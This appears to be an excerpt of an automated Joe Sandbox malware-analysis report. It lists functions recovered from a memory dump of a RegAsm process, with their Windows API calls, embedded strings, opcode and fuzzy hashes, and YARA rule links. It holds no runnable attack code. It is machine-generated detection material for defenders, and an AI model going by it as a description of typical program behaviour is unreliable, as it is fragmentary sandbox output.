                                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 822687973-0
                                                                                                                                                                                • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                                • free.MSVCRT ref: 0041747F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2605342592-0
                                                                                                                                                                                • Opcode ID: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                                                                                                                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                • Opcode Fuzzy Hash: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2678498856-0
                                                                                                                                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Item
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3888421826-0
                                                                                                                                                                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3727323765-0
                                                                                                                                                                                • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                                                • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy$CloseHandle
                                                                                                                                                                                • String ID: General
                                                                                                                                                                                • API String ID: 3722638380-26480598
                                                                                                                                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 764393265-0
                                                                                                                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 979780441-0
                                                                                                                                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1386444988-0
                                                                                                                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                                                                                • String ID: d=E
                                                                                                                                                                                • API String ID: 909852535-3703654223
                                                                                                                                                                                • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                                                                                • String ID: "
                                                                                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                                                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                • String ID: URL
                                                                                                                                                                                • API String ID: 2108176848-3574463123
                                                                                                                                                                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                                                                                • String ID: %2.2X
                                                                                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintf
                                                                                                                                                                                • String ID: %%-%d.%ds
                                                                                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                                                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                                                • String ID: F^@
                                                                                                                                                                                • API String ID: 568519121-3652327722
                                                                                                                                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PlacementWindowmemset
                                                                                                                                                                                • String ID: WinPos
                                                                                                                                                                                • API String ID: 4036792311-2823255486
                                                                                                                                                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                Function 00414E13 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
